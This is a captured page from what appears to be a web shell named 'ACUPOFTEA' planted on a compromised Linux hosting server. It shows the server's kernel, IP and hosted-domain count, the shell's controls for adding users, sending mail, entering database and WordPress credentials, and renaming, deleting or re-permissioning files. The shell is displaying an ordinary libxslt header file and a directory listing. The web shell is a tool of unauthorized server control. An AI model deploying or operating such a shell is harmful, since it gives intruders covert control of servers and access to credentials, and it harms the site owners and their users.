System
:
Linux server1.ontime-gulf.com 4.18.0-553.5.1.el8_10.x86_64 #1 SMP Wed Jun 5 09:12:13 EDT 2024 x86_64
Software
:
Apache
Server
:
162.0.230.206
Domains
:
40 Domain
Permission
:
[
drwxr-xr-x
]
:
/
usr
/
include
/
libxslt
/
216.73.216.6
Select
Submit
Home
Add User
Mailer
About
DBName
DBUser
DBPass
DBHost
WpUser
WpPass
Input e-mail
ACUPOFTEA for mail.ontime-ae.com made by tabagkayu.
Folder Name
File Name
File Content
File
documents.h
/* * Summary: interface for the document handling * Description: implements document loading and cache (multiple * document() reference for the same resources must * be equal. * * Copy: See Copyright for the status of this software. * * Author: Daniel Veillard */ #ifndef __XML_XSLT_DOCUMENTS_H__ #define __XML_XSLT_DOCUMENTS_H__ #include <libxml/tree.h> #include "xsltexports.h" #include "xsltInternals.h" #ifdef __cplusplus extern "C" { #endif XSLTPUBFUN xsltDocumentPtr XSLTCALL xsltNewDocument (xsltTransformContextPtr ctxt, xmlDocPtr doc); XSLTPUBFUN xsltDocumentPtr XSLTCALL xsltLoadDocument (xsltTransformContextPtr ctxt, const xmlChar *URI); XSLTPUBFUN xsltDocumentPtr XSLTCALL xsltFindDocument (xsltTransformContextPtr ctxt, xmlDocPtr doc); XSLTPUBFUN void XSLTCALL xsltFreeDocuments (xsltTransformContextPtr ctxt); XSLTPUBFUN xsltDocumentPtr XSLTCALL xsltLoadStyleDocument (xsltStylesheetPtr style, const xmlChar *URI); XSLTPUBFUN xsltDocumentPtr XSLTCALL xsltNewStyleDocument (xsltStylesheetPtr style, xmlDocPtr doc); XSLTPUBFUN void XSLTCALL xsltFreeStyleDocuments (xsltStylesheetPtr style); /* * Hooks for document loading */ /** * xsltLoadType: * * Enum defining the kind of loader requirement. */ typedef enum { XSLT_LOAD_START = 0, /* loading for a top stylesheet */ XSLT_LOAD_STYLESHEET = 1, /* loading for a stylesheet include/import */ XSLT_LOAD_DOCUMENT = 2 /* loading document at transformation time */ } xsltLoadType; /** * xsltDocLoaderFunc: * @URI: the URI of the document to load * @dict: the dictionary to use when parsing that document * @options: parsing options, a set of xmlParserOption * @ctxt: the context, either a stylesheet or a transformation context * @type: the xsltLoadType indicating the kind of loading required * * An xsltDocLoaderFunc is a signature for a function which can be * registered to load document not provided by the compilation or * transformation API themselve, for example when an xsl:import, * xsl:include is found at compilation time or when a document() * call is made at runtime. * * Returns the pointer to the document (which will be modified and * freed by the engine later), or NULL in case of error. */ typedef xmlDocPtr (*xsltDocLoaderFunc) (const xmlChar *URI, xmlDictPtr dict, int options, void *ctxt, xsltLoadType type); XSLTPUBFUN void XSLTCALL xsltSetLoaderFunc (xsltDocLoaderFunc f); /* the loader may be needed by extension libraries so it is exported */ XSLTPUBVAR xsltDocLoaderFunc xsltDocDefaultLoader; #ifdef __cplusplus } #endif #endif /* __XML_XSLT_DOCUMENTS_H__ */
New name for
Are you sure will delete
?
New date for
New perm for
Name
Type
Size
Permission
Last Modified
Actions
.
DIR
-
drwxr-xr-x
2025-08-28 10:58:31
..
DIR
-
drwxr-xr-x
2025-10-28 10:57:27
attributes.h
text/x-c
930 B
-rw-r--r--
2015-05-10 02:11:29
documents.h
text/x-c
2.64 KB
-rw-r--r--
2015-05-10 02:11:29
extensions.h
text/x-c
6.74 KB
-rw-r--r--
2012-09-04 02:26:23
extra.h
text/x-c
1.6 KB
-rw-r--r--
2017-08-29 11:20:04
functions.h
text/x-c
1.96 KB
-rw-r--r--
2015-05-10 02:11:29
imports.h
text/x-c
1.8 KB
-rw-r--r--
2015-05-10 02:11:29
keys.h
text/x-c
1.13 KB
-rw-r--r--
2015-05-10 02:11:29
namespaces.h
text/x-c
1.63 KB
-rw-r--r--
2015-05-10 02:11:30
numbersInternals.h
text/x-c
1.97 KB
-rw-r--r--
2015-05-10 02:11:30
pattern.h
text/x-c
1.95 KB
-rw-r--r--
2012-09-04 02:26:23
preproc.h
text/x-c
892 B
-rw-r--r--
2015-05-10 02:11:30
security.h
text/x-c
2.59 KB
-rw-r--r--
2015-05-10 02:11:30
templates.h
text/x-c
2.21 KB
-rw-r--r--
2015-05-10 02:11:30
transform.h
text/x-c
6.18 KB
-rw-r--r--
2015-02-27 06:00:23
variables.h
text/x-c
3.07 KB
-rw-r--r--
2025-08-26 08:55:04
xslt.h
text/x-c
1.92 KB
-rw-r--r--
2015-05-10 02:11:30
xsltInternals.h
text/x-c
56.14 KB
-rw-r--r--
2025-08-26 08:55:04
xsltconfig.h
text/x-c
3.5 KB
-rw-r--r--
2025-08-26 08:55:13
xsltexports.h
text/plain
3.35 KB
-rw-r--r--
2009-05-12 06:29:34
xsltlocale.h
text/x-c
1.51 KB
-rw-r--r--
2017-10-26 07:55:47
xsltutils.h
text/x-c
8.49 KB
-rw-r--r--
2025-08-26 08:55:04
~ ACUPOFTEA - mail.ontime-ae.com